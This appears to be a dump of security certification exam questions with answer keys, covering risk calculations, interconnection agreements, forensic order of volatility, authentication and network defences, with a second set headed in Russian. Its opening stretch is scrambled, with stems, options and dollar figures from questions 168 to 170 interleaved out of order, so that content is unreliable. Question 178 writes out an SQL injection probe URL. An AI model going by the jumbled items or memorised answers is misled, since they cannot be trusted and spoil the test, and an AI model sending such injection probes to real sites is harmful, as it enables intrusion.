000 B. WAF Correct Answer: CE Section: Mixed Questions Explanation . CHAP D. A.000 C. PAP C. NIPS B. NIDS E. HSM C.B.000 per month.000 per incident. Which of the following is the ROI for this proposal after three years? A. Expected to reduce the number of current incidents per annum by 50%.000 Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 169 A software developer and IT administrator are focused on implementing security in the organization to protect OSI layer 7. $120. The company currently has ten security incidents per annum at an average cost of $10. $180. Proposal: External cloud-based software as a service subscription costing $5. Which of the following security technologies would BEST meet their requirements? (Select TWO).000 D. $150. The intention is that the cost of the SIEM solution will be justified by having reduced the number of incidents and therefore saving on the amount spent investigating incidents. HOTP Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 168 A security manager is looking into the following vendor proposal for a cloud-based SIEM solution. -$30. HIPS D.

which of the following BEST represents the remaining order of volatility that the investigator should follow? A. Which of the following BEST describes the application issue? A. SOA E.Explanation/Reference: QUESTION 170 The finance department for an online shopping website has discovered that a number of customers were able to purchase goods and services without any payments. A specially crafted value could be entered and cause a roll over. MOU D. Further analysis conducted by the security investigations team indicated that the website allowed customers to update a payment amount for shipping. system processes and raw disk blocks. ISA B. Race condition B. SQL injection Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 171 A bank has decided to outsource some existing IT functions and systems to a third party service provider. BPA Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 172 An investigator wants to collect the most volatile data first in an incident to preserve the data that runs the highest risk of being lost. As a result. resulting in the shipping cost being subtracted from the balance and in some instances resulted in a negative balance. After memory. Integer overflow D. network processes. the system processed the negative balance as zero dollars. . File system information. BIA C. swap files. The third party service provider will manage the outsourced systems on their own premises and will continue to directly interface with the bank's other systems through dedicated encrypted links. Use after free E. Which of the following is critical to ensure the successful management of system security concerns between the two organizations? A. Click-jacking C.

Perform a security risk assessment with recommended solutions to close off high-rated risks C. swap files. and file system information.B. Perform access control testing to ensure that privileges have been configured correctly E. network processes. system processes. email gateway. and web proxies E. network processes. swap files and file system information. Raw disk blocks. Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 173 A security architect has been engaged during the implementation stage of the SDLC to review a new HR software installation for security gaps. A. Review of security policies and procedures Correct Answer: CD Section: Mixed Questions Explanation Explanation/Reference: . C. file system information. Implement DLP on the desktop. System processes. network processes. which of the following security activities should be prioritized by the security architect? (Select TWO). Secure code review of the HR solution to identify security gaps that could be exploited D. A. With the project under a tight schedule to meet market commitments on project delivery. Implement a URL filter to block the online forum B. Raw disk blocks. An investigation has identified that internal employees are sharing confidential corporate information on a daily basis. Which of the following are the MOST effective security controls that can be implemented to stop the above problem? (Select TWO). Perform penetration testing over the HR solution to identify technical vulnerabilities B. D. Implement NIDS on the desktop and DMZ networks C. Security awareness compliance training for all employees D. swap files and raw disk blocks. system processes. Determine if the information security standards have been complied with by the project Correct Answer: BE Section: Mixed Questions Explanation Explanation/Reference: QUESTION 174 A company has noticed recently that its corporate information has ended up on an online forum.

BIA C. Run a protocol analyzer perform static code analysis and vulnerability assessment Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 177 An insurance company has an online quoting system for insurance premiums. due to legacy systems. and static code analysis D. the following patterns were detected: Pattern 1 Analysis of the logs identifies that insurance premium forms are being filled in but only single fields are incrementally being updated. BPA B. It allows potential customers to fill in certain details about their car and obtain a quote. Which of the following security documents should be used to clarify the roles and responsibilities between the teams? A. Perform dynamic code analysis. OLA Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 176 A security services company is scoping a proposal with a client. They want to perform a general security audit of their environment within a two week period and consequently have the following requirements: Requirement 1 Ensure their server infrastructure operating systems are at their latest patch levels Requirement 2 Test the behavior between the application and database Requirement 3 Ensure that customer data can not be exfiltrated Which of the following is the BEST solution to meet the above requirements? A. Pattern 2 For every quote completed. MOU D. dynamic code analysis. penetration test and run a vulnerability scanner C. . perform social engineering and run a vulnerability scanner B. Penetration test. During an investigation.QUESTION 175 An employee is performing a review of the organization's security functions and noticed that there is some cross over responsibility between the IT security team and the financial fraud team. a new customer number is created. and what is the BEST way to defend against it? (Select TWO). customer numbers are running out. Which of the following is the attack type the system is susceptible to. Conduct network analysis.

Cross site scripting attack C. Which of the following BEST maximizes the protection of these systems from malicious software? A. SQL injection D. Apply a hidden field that triggers a SIEM alert B. Implement firewall rules to block the attacking IP addresses Correct Answer: CF Section: Mixed Questions Explanation Explanation/Reference: QUESTION 178 A security tester is testing a website and performs the following manual query: https://www. SQL injection F.jsp?products=5%20and%201=1 The following response is received in the payload: "ORA-000001: SQL command not properly ended" Which of the following is the response an example of? A. Input a blacklist of all known BOT malware IPs into the firewall E.A.com/cookies. Implement an inline WAF and integrate into SIEM G.comptia. Configure the host firewall to ensure only the necessary applications have listening ports Correct Answer: C . Distributed denial of service H. Configure the systems to ensure only necessary applications are able to run D. Resource exhaustion attack D. Configure a separate zone for the systems and restrict access to known ports C. Cross-site scripting C. Privilege escalation Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 179 An organization has several production critical SCADA supervisory systems that cannot follow the normal 30-day patching policy. Configure a firewall with deep packet inspection that restricts traffic to the systems B. Fingerprinting B.

B. However. Implement geo-fencing to track products. Implement data analytics to try and correlate the occurrence times. D. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 181 A trucking company delivers products all over the country. Require cloud storage on corporate servers and disable access upon termination B. The company would like to protect confidential information. Which of the following should the administrator do to prove this theory? A. Install GSM tracking on each product for end-to-end delivery visibility. Whitelist access to only non-confidential information C. C. Which of the following would BEST help the executives meet this goal? A. Which of the following would MOST likely help the company maintain security when employees leave? A. The administrator suspects that these traffic floods correspond to when a competitor makes major announcements. Log all traffic coming from the competitor's public IP addresses. The executives at the company would like to have better insight into the location of their drivers to ensure the shipments are following secure routes. Implement a honey pot to capture traffic during the next attack. Require drivers to geo-tag documentation at each delivery location. Utilize an MDM solution with containerization D.Section: Mixed Questions Explanation Explanation/Reference: QUESTION 180 An administrator believes that the web servers are being flooded with excessive traffic from time to time. Equip each truck with an RFID tag for location services. Require that devices not have local storage . Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 182 A company has adopted a BYOD program. B. Configure the servers for high availability to handle the additional bandwidth. D. the company will not completely wipe the personal device. it has been decided that when an employee leaves. C.

0.company. and dc3. 0 B.company. 6 Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 185 A security administrator is assessing a new application.com. At the border router. 1 C. How might the administrator test that the strings are indeed encrypted in memory? . BGP route hijacking attacks B.113. Bogon IP network traffic C. 3 D. IP spoofing attacks D. Amplified DDoS attacks Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 184 Using SSL.com.0/24 on its internal network.com.west. and to deny packets with a destination address in this subnet from leaving the network.Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 183 An organization uses IP address block 203. dc2.company.central. an administrator wishes to secure public facing server farms in three subdomains: dc1. Man-in-the-middle attacks E. Which of the following is the number of wildcard SSL certificates that should be purchased? A. the network administrator sets up rules to deny packets with a source address in this subnet from entering the network. Which of the following is the administrator attempting to prevent? A.east. The application uses an API that is supposed to encrypt text strings that are stored in memory.

Use fuzzing techniques to examine application inputs B. Use a packet analyzer to inspect the strings D. Presence software F. Back office database B. Additionally. Run nmap to attach to application memory C. A. Identity attestation H. Barcode scanner Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 187 The telecommunications manager wants to improve the process for assigning company-owned mobile devices and ensuring data is properly removed when no longer needed. Which of the following should be implemented to ensure these processes can be automated? (Select THREE). the manager wants to onboard and offboard personally owned mobile devices that will be used in the BYOD initiative. Initiate a core dump of the application E. Chargeback system D. The company wants to reduce the idle time associated with international deliveries by ensuring that personnel are automatically notified when an inbound delivery arrives at the transit dock. Asset tracking C. Use an HTTP interceptor to capture the text strings Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 186 An international shipping company discovered that deliveries left idle are being tampered with. Email profiles G. Which of the following should be implemented to help the company increase the security posture of its operations? A. GPS tracking .A. Remote wiping C. SIM's PIN B. MDM software E. Geo-fencing D.

000 C.800 B. $24. Fires occur in the area on average every four years.000 C. the exposure factor to fires is only 20% due to the fire suppression system installed at the site.000 D. $30.Correct Answer: BDG Section: Mixed Questions Explanation Explanation/Reference: QUESTION 188 The risk manager at a small bank wants to use quantitative analysis to determine the ALE of running a business system at a location which is subject to fires during the year.000 and.000 Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 190 A risk manager has decided to use likelihood and consequence to determine the risk of an event occurring to a company asset. Which of the following is the correct asset value calculated by the accountant? A. $96. The risk manager only provided the accountant with the SLE of $24.000 Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 189 An accountant at a small business is trying to understand the value of a server to determine if the business can afford to buy another server for DR. $6.000. Which of the following is the ALE? A. A risk analyst reports to the risk manager that the asset value of the business system is $120. based on industry data.000 B. Which of the following is a limitation of this approach to risk management? . $96. ARO of 20% and the exposure factor of 25%. $24. $4. $120.000 D.

Dynamic disk pools E. A. Deduplication Correct Answer: DE Section: Mixed Questions Explanation Explanation/Reference: .CMAC or HMAC-SHA256 to sign data? A. Subjective and based on an individual's experience. C. FCoE D. Snapshots C. SMB B. medium. vSAN D. In selecting a storage protocol. LUN masking B. the administrator would like the data in transit's integrity to be the most important concern.A. NFS C. and low risks. Allows for cost and benefit analysis. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 191 An administrator is implementing a new network-based storage device. E. Difficult to differentiate between high. D. B. Which of the following technologies should the administrator implement to meet these goals? (Select TWO). Which of the following protocols meets these needs by implementing either AES. iSCSI Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 192 A security administrator is tasked with increasing the availability of the storage networks while enhancing the performance of existing applications. Calculations can be extremely complex to manage. Requires a high degree of upfront work to gather environment details. Multipath F.

PKI C. Each time changes are attempted. it appears that the system is not being patched at all. Which of the following is the solutions architect MOST likely trying to implement? A. Upon further review. Reset root permissions on systemd files C. Which of the following troubleshooting steps should the security administrator suggest? A. Implement an application layer firewall to protect the payroll system interface C. The distribution is configured to be "secure out of the box". Review settings in the SELinux configuration files B. The system administrator cannot make updates to certain system files and services. Isolate the system on a secure network to limit its contact with other systems B. The method also requires special handling and security for all key material that goes above and beyond most encryption systems. Digital rights management Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 195 A critical system audit shows that the payroll system is not meeting security policy due to missing OS security patches. Perform all administrative actions while logged in as root D. Quantum cryptography D. Monitor the system's security log for unauthorized access to the payroll application .QUESTION 193 A system administrator has just installed a new Linux distribution. they are denied and a system error is generated. The proposed solution uses symmetric keys to encrypt all messages and is very resistant to unauthorized decryption. One time pads B. Which of the following compensating controls should be used to mitigate the vulnerability of missing OS patches on this system? A. The solution has been derided as not being cost effective by other members of the IT department. The vendor states that the system is only supported on the current OS patch level. Disable any firewall software before making changes Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 194 A security solutions architect has argued consistently to implement the most secure method of encrypting corporate messages.

It is also anticipated that the city's emergency and first response communication systems will be required to operate across the same network. and the application requires that the connection have read/write permissions. Which of the following should the project manager release to the public. RFI C. RFP D. Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 197 A project manager working for a large city government is required to plan and build a WAN. and private industry to ensure the city provides due care in considering all project factors prior to building its new WAN? A. In order to further secure the data. academia. The project manager has experience with enterprise IT projects. Accept the risk in order to keep the system within the company's standard security configuration. NDA B. Secure the data despite the need to use a security control or solution that is not within company standards. Explain the risks to the data owner and aid in the decision to accept the risk versus choosing a nonstandard solution. B. The host does not have a security mechanism to authenticate the incoming ODBC connection. The information in the database is not sensitive. but feels this project has an increased complexity as a result of the mixed business / public use and the critical infrastructure it will provide. but was not readily accessible prior to the implementation of the ODBC connection. C.D. D. RFQ Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: . Do not allow the connection to be made to avoid unnecessary risk and avoid deviating from the standard security configuration. Which of the following actions should be taken by the security analyst? A. a nonstandard configuration would need to be implemented. which will be required to host official business and public access. Perform reconciliation of all payroll transactions on a daily basis Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 196 ODBC access to a database on a network-connected host is required.

Which of the following would suggest best practices and configuration parameters that technicians could follow during the deployment process? A. B. Volatile system memory F. Automated workflow B. Guideline E. Removable media B. D. Which of the following would be a logical next step? A. The assessor submitted the report to senior management but nothing has happened.QUESTION 198 In a situation where data is to be recovered from an attacker's location. Include specific case studies from other organizations in an updated report. Procedure C. Documents on the printer E. A. Corporate standard D. Craft an RFP to begin finding a new human resource application. Passwords written on scrap paper C. Policy Correct Answer: D Section: Mixed Questions . Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 200 An IT Manager is concerned about errors made during the deployment process for a new model of tablet. C. Meet the two key VPs and request a signature on the original assessment. Schedule a meeting with key human resource application stakeholders. Snapshots of data on the monitor D. System hard drive Correct Answer: CE Section: Mixed Questions Explanation Explanation/Reference: QUESTION 199 An information security assessor for an organization finished an assessment that identified critical issues with the human resource new employee management software application. which of the following are the FIRST things to capture? (Select TWO).

$0 B.500 E. $10. the ALE resulting from a data leak is $25. $12. both parties must agree to the controls utilized to secure data connections between the two enterprise systems. Which of the following values is the single loss expectancy of a data leakage event after implementing the web filtering solution? A. This is commonly documented in which of the following formal documents? A. However. Operating Level Agreement Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 203 A facilities manager has observed varying electric use on the company's metered service lines. Given that the ARO is twice per year. As part of this process. The web filtering solution will cost the organization $10. $7. Interoperability Agreement E.000.500 C. The facility management rarely interacts with the IT department unless new equipment is being delivered.000 and the ALE after implementing the web filter is $15.000 per year.Explanation Explanation/Reference: QUESTION 201 An IT manager is concerned about the cost of implementing a web filtering solution in an effort to mitigate the risks associated with malware and resulting data leakage. Memorandum of Understanding B. .000 Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 202 An IT manager is working with a project manager to implement a new ERP system capable of transacting data between the new ERP system and the legacy system. the facility manager thinks that there is a correlation between spikes in electric use and IT department activity. $15.000 D. Which of the following business processes and/or practices would provide better management of organizational resources with the IT department's needs? (Select TWO). Interconnection Security Agreement D. Information System Security Agreement C.

of one or more of the Linux servers. Purchasing software asset management software E. C. Allow the security engineering team to do application development so they understand why it takes so long. and install needed patches. Deploying a radio frequency identification tagging asset management system B. Implementation of change management best practices Correct Answer: EG Section: Mixed Questions Explanation Explanation/Reference: QUESTION 204 A company has a difficult time communicating between the security engineers. D. A vulnerability scan found a collection of Linux servers that are missing OS level patches. application developers. The security engineers and application developers are falling behind schedule. C. B. Designing a business resource monitoring system C. What would be a key FIRST step for the data security team to undertake at this point? A. Capture process ID data and submit to anti-virus vendor for review. Rewriting the change board charter G. D. Notify upper management of a security breach. Conduct a bit level image. Allow the sales staff to learn application programming and security engineering so they understand the whole lifecycle. and sales staff. Correct Answer: E Section: Mixed Questions Explanation . a technician notices that there are a few unidentified processes running on a number of the servers. Hiring a property custodian D. Reboot the Linux servers. Allow the sales staff to shadow the developers and engineers to see how their sales impact the deliverables. Remove a single Linux server from production and place in quarantine. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 205 The DLP solution has been showing some unidentified encrypted data being sent using FTP to a remote server. Upon further investigation.A. check running processes. including RAM. Which of the following should be done to solve this? A. The sales staff tends to overpromise the application deliverables. E. B. Facility management participation on a change control board F. Allow the application developers to attend a sales conference so they understand how business is done.

Which of the following actions would protect the external network interfaces from external attackers performing network scanning? A. D. A public SaaS D. Implement change control practices at the organization level. Update the vulnerability management plan to address data discrepancy issues. The development team has direct access to the production servers and is most likely the cause of the different release versions. Which of the following process level solutions would address this problem? A. A public IaaS B. C. A public PaaS C. Filter all internal ICMP message traffic. forcing attackers to use full-blown TCP port scans against external network interfaces. B. Which of the following solutions should be recommended? A. the management of a small candy company wishes to explore a cloud service option for the development of its online applications. Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 208 In an effort to minimize costs. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 207 A senior network security engineer has been tasked to decrease the attack surface of the corporate network. The company does not wish to invest heavily in IT infrastructure. it has been determined that there are version mismatches of key e-commerce applications on the production web servers. Remove contact details from the domain name registrar to prevent social engineering attacks.Explanation/Reference: QUESTION 206 Customers have recently reported incomplete purchase history and other anomalies while accessing their account history on the web server farm. Test external interfaces to see how they function when they process fragmented IP packets. B. C. Enable a honeynet to capture and facilitate future analysis of malicious attack vectors. D. Upon investigation. Change development methodology from strict waterfall to agile. A private SaaS . Adjust the firewall ACL to prohibit development from directly accessing the production server farm.

Which of the following meets these requirements? A. The requirements are: 1. ACL on routing equipment Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 210 A small company is developing a new Internet-facing web application. 2. Each lab must be on a separate network segment. C. and programming courses. . 4. A private PaaS Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 209 An educational institution would like to make computer labs available to remote students. Student devices must have network access. SAML for federated authentication. 6. ACLs on network equipment D. Passwords must not be stored in the code. RADIUS for authentication. Which of the following components should be used to achieve the design in conjunction with directory services? A.E. 3. Use OpenID and allow a third party to authenticate users. 3. B. 2. Use SAML with federated directory services. 5. not simple access to hosts on the lab networks. A private IaaS F. L2TP VPN over TLS for remote connectivity. but not other lab networks. Servers must have a private certificate installed locally to provide assurance to the students. security. D. firewalls between each lab segment B. Cloud service remote access tool for remote connectivity. SSL VPN for remote connectivity. Use TLS with a shared client certificate for all users. ACLs on routing equipment C. Use Kerberos and browsers that support SAML. IPSec VPN with mutual authentication for remote connectivity. All students must use the same VPN connection profile. directory services groups for each lab group. Users of the web application will not be added to the company's directory services. OAuth for authentication. Labs must have access to the Internet. The security requirements are: 1. The labs are used for various IT networking. Users of the web application must be uniquely identified and authenticated. Students must have a private certificate installed before gaining access.

Which of the following designs is MOST appropriate for this scenario? A. Insider threat B. Deploy a branch location Read-Only Domain Controller in the DMZ at the main campus with a two-way trust. The branch location does not have a datacenter. and the physical security posture of the building is weak. Deploy a corporate Domain Controller in the DMZ at the main campus. Which of the following could the company view as a downside of using presence technology? A. Physical security D.Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 211 A company is trying to decide how to manage hosts in a branch location connected via a slow WAN link. The company desires to provide the same level of performance and functionality to the branch office as it provides to the main campus. D. The company uses Active Directory for its directory service and host configuration management. C. F. Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 212 A multi-national company has a highly mobile workforce and minimal IT infrastructure. Industrial espionage Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: . B. As a result of the dispersed employees and frequent international travel. Deploy a corporate Read-Only Domain Controller to the branch location. Network reconnaissance C. Deploy a branch location Read-Only Domain Controller to the branch office location with a one-way trust. Deploy a corporate Domain Controller to the branch location. the company is concerned about the safety of employees and their families when moving in and out of certain countries. The company utilizes a BYOD and social media policy to integrate presence technology into global collaboration tools by individuals and teams. Deploy a branch location Domain Controller to the branch location with a one-way trust. E.

while customer acceptance testing will be performed in house. Information digest G. Acceptance testing F. User requirements C. End to end network encryption Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 215 The IT Security Analyst for a small organization is working on a customer's system and identifies a possible intrusion in a database that contains PII. ISP to ISP network jitter D.QUESTION 213 A finance manager says that the company needs to ensure that the new system can "replay" data. for every exchange being tracked by the investment departments. the analyst wants to get the issue addressed as soon as possible. The project manager is responsible for a new software development effort that is being outsourced overseas. Data elements D. File-size validation E. up to the minute. . Shut down the production network interfaces on the server and change all of the DBMS account passwords. Source code vulnerability scanning B. Which of the following capabilities is MOST likely to cause issues with network availability? A. Time-based access control lists C. Compliance standards B. Contact the local authorities so an investigation can be started as quickly as possible. Since PII is involved. Which of the following is the FIRST step the analyst should take in mitigating the impact of the potential intrusion? A. How would a security engineer BEST interpret the finance manager's needs? A. Data storage E. B. System requirements Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 214 An IT manager is working with a project manager from another subsidiary of the same multinational organization. The finance manager also states that the company's transactions need to be tracked against this data for a period of five years for compliance.

Implement group policy objects Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 217 Company XYZ finds itself using more cloud-based business tools.C. Every user receives a popup warning about this policy upon login. B. Refer the issue to management for handling according to the incident response process. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: . password replication and shared accounts are not acceptable. Revise the corporate policy to include possible termination as a result of violations B. D. Which of the following implementations addresses the distributed login with centralized authentication and has wide compatibility among SaaS vendors? A. Disable the front-end web server and notify the customer by email to determine how the customer would like to proceed. yet violations continue to occur. Allow external connections to the existing corporate RADIUS server. The SIEM system produces a report of USB violations on a monthly basis. The CISO knows the acceptable use policy prohibits the use of USB storage devices. Security is important to the company. D. Increase the frequency and distribution of the USB violations report C. Install a read-only Active Directory server in the corporate DMZ for federation. Implement a new Diameter authentication server with read-only attestation. and password management is becoming onerous. Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 216 The Chief Information Security Officer (CISO) at a large organization has been reviewing some security-related incidents at the organization and comparing them to current industry trends. as a result. C. The desktop security engineer feels that the use of USB storage devices on office computers has contributed to the frequency of security incidents. Deploy PKI to add non-repudiation to login sessions so offenders cannot deny the offense D. Establish a cloud-based authentication service that supports SAML. Which of the following preventative controls would MOST effectively mitigate the logical risks associated with the use of USB storage devices? A.

The CIO has hired consultants to develop use cases to test against various government and industry security standards. A. Which of the following selections represent the BEST option for the CIO? A. LDAP D. the central authentication system must support hierarchical trust and the ability to natively authenticate mobile devices and workstations. Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 220 A security administrator was recently hired in a start-up company to represent the interest of security and to assist the network team in improving security in the company. Issue a policy specifying best practice security standards and a baseline to be implemented across the company. At the end of the project C. RADIUS E. D. The programmers are not on good terms with the security team and do not want to be distracted with security issues while they are working on a major project. In the middle of the project B. At the inception of the project . The CIO is convinced that there is large overlap between the configuration checks and security controls governing each set of standards. Shibboleth F. B.QUESTION 218 A network engineer wants to deploy user-based authentication across the company's wired and wireless infrastructure at layer 2 of the OSI model. Company policies require that users be centrally managed and authenticated and that each user's network access be controlled based on the user's role within the company. Which of the following are needed to implement these requirements? (Select TWO). Issue a policy that requires only the most stringent security standards be implemented throughout the company. SAML B. Which of the following is the BEST time to make them address security issues in the project? A. C. Issue a RFI for vendors to determine which set of security standards is best for the company. Issue a RFQ for vendors to quote a complete vulnerability and risk management solution to the company. PKI Correct Answer: CD Section: Mixed Questions Explanation Explanation/Reference: QUESTION 219 A company Chief Information Officer (CIO) is unsure which set of standards should govern the company's IT policy. WAYF C. Additionally.

D. At the time they request Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: .

The company should use a mixture of both systems to meet minimum standards. D. Force all SIP communication to be encrypted C. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic. Which of the following methodologies should be adopted? A. The company should use the CEO's encryption scheme. B. The company should use the method recommended by other respected information security organizations. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 3 A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. He has recommended that the company use his cryptographic method.Экзамен B QUESTION 1 An attacker attempts to create a DoS event against the VoIP system of a company. the Chief Executive Officer (CEO). He has designed a network defense method which he says is significantly better than prominent international standards. D. The company should develop an in-house solution and keep the algorithm a secret. Survey threat feeds from services inside the same industry. B. was an Information security professor and a Subject Matter Expert for over 20 years. The attacker uses a tool to flood the network with a large number of SIP INVITE traffic. Deploy a UTM solution that receives frequent updates from a trusted industry vendor. Conduct an internal audit against industry best practices to perform a qualitative analysis. C. Create separate VLANs for voice and data traffic D. Implement QoS parameters on the switches Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 2 Joe. Correct Answer: A Section: (none) . Which of the following would be LEAST likely to thwart such an attack? A. C. Which of the following should the CSO conduct FIRST? A. Install IDS/IPS systems on the network B.

IPtables firewall D. Which of the following tools can BEST meet the CISO's requirement? A. GRC . HIPS Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 5 A large enterprise acquires another company which uses antivirus from a different vendor. Which of the following would BEST accomplish this? A. SELinux C. Access control lists B.Explanation Explanation/Reference: QUESTION 4 An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions. The CISO has requested that data feeds from the two different antivirus platforms be combined in a way that allows management to assess and rate the overall effectiveness of antivirus across the entire organization.

When speaking with the network administrator. Syslog-ng E. C. the security administrator learns that the existing routers have the minimum processing power to do the required level of encryption. Parse all images to determine if extra data is hidden using steganography. Correct Answer: AC Section: (none) Explanation Explanation/Reference: . Install an SSL acceleration appliance C. A technician notices that the date/time stamp of the image source appears to have changed. Add an encryption module to the router and configure IPSec Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 7 The source workstation image for new accounting PCs has begun blue-screening. Which of the following methods would BEST help with this process? (Select TWO). B. A. ABC Company must now encrypt all WAN transmissions. IPS C. E. Ask desktop support if any changes to the images were made. D. Retrieve source system image from backup and run file comparison analysis on the two images. Require all core business applications to use encryption D. Deploy inline network encryption devices B. The desktop support director has asked the Information Security department to determine if any changes were made to the source image. Calculate a new hash and compare it with the previously captured image hash. CMDB D. Which of the following solutions minimizes the performance impact on the router? A.B. IDS Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 6 Due to a new regulatory requirement. Check key system files to see if date/time stamp is in the past six months.

User access audit reviews F. D. Implement hashing of data in transit B. Virtualize the system and migrate it to a cloud provider. A. Additionally. Segment the device on its own secure network. Source IP whitelisting Correct Answer: CEF Section: (none) Explanation Explanation/Reference: . B. Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 9 An organization has decided to reduce labor costs by outsourcing back office processing of credit applications to a provider located in another country. Monitor approved credit accounts E. To facilitate communications and improve productivity. Install an antivirus and HIDS on the system.QUESTION 8 The risk manager is reviewing a report which identifies a requirement to keep a business critical legacy system operational for the next two years. The legacy system is out of support because the vendor and security patches are no longer released. Session recording and capture C. Which of the following should the Information Technology department implement to reduce the security risk from a compromise of this system? A. C. Hire developers to reduce vulnerabilities in the code. this is a proprietary embedded system and little is documented and known about it. Data sovereignty and privacy concerns raised by the security team resulted in the third-party provider only accessing and processing the data via remote desktop sessions. Disable cross session cut and paste D. staff at the third party has been provided with corporate email accounts that are only accessible via the remote desktop sessions. Email forwarding is blocked and staff at the third party can only communicate with staff within the organization. Which of the following additional controls should be implemented to prevent data loss? (Select THREE).

B. D. Publish a policy that addresses the security requirements for working remotely with company equipment. The implementation of a new SSL-VPN and a VOIP phone solution enables personnel to work from remote locations with corporate assets. C. Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 11 A security engineer is responsible for monitoring company applications for known vulnerabilities. Work with mid-level managers to identify and document the proper procedures for telecommuting. Which of the following steps must the committee take FIRST to outline senior management's directives? A. Which of the following is a way to stay current on exploits and information security news? A. The organization has not addressed telecommuting in the past. Ensure that the organization vulnerability management plan is up-to-date Correct Answer: B Section: (none) Explanation Explanation/Reference: . Develop an information classification scheme that will properly secure data on corporate systems.QUESTION 10 The technology steering committee is struggling with increased requirements stemming from an increase in telecommuting. Implement security awareness training D. Implement database views and constrained interfaces so remote users will be unable to access PII from personal equipment. Update company policies and procedures B. Subscribe to security mailing lists C.

Calculate the ALE for the event D. Operating Level Agreement Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 13 A security officer is leading a lessons learned meeting. Which of the following designs BEST supports the given . Non-Disclosure Agreement D. Memorandum of Agreement B.QUESTION 12 A security manager for a service provider has approved two vendors for connections to the service provider backbone. A. Assigning of follow up items Correct Answer: DE Section: (none) Explanation Explanation/Reference: QUESTION 14 The senior security administrator wants to redesign the company DMZ to minimize the risks associated with both external and internal threats. and the other vendor will be providing maintenance to the service provider infrastructure sites. Interconnection Security Agreement C. The DMZ design must support security in depth. Discussion of event timeline E. and support incident reconstruction. Demonstration of IPS system B. change management and configuration processes. One vendor will be providing authentication services for its payment card service. Which of the following business agreements is MOST relevant to the vendors and service provider's relationship? A. Which of the following should be components of that meeting? (Select TWO). Review vendor selection process C.

A single firewall DMZ where each firewall interface is managed by a separate administrator and logging to the cloud.54 Based on the output. but the following ports are open on the device: TCP/22 TCP/111 TCP/512-514 TCP/2049 TCP/32778 Based on this information.requirements? A. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 15 Which of the following provides the BEST risk calculation methodology? A. where each virtual instance is managed by a separate administrator and logging to the same hardware. she runs the following nmap command string: user@hostname:~$ sudo nmap O 192. Linux . Annual Loss Expectancy (ALE) x Value of Asset B. Impact x Threat x Vulnerability D. A SaaS based firewall which logs to the company's local storage via SSL. which of the following operating systems is MOST likely running on the unknown node? A. A dual firewall DMZ with remote logging where each firewall is managed by a separate administrator. Risk Likelihood x Annual Loss Expectancy (ALE) Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 16 Ann. D. To begin her investigative work.168. B. and is managed by the change control team. C. A virtualized firewall. Potential Loss x Event Probability x Control Failure Probability C.1. a systems engineer. nmap is unable to identify the OS running on the node. is working to identify an unknown node on the corporate network.

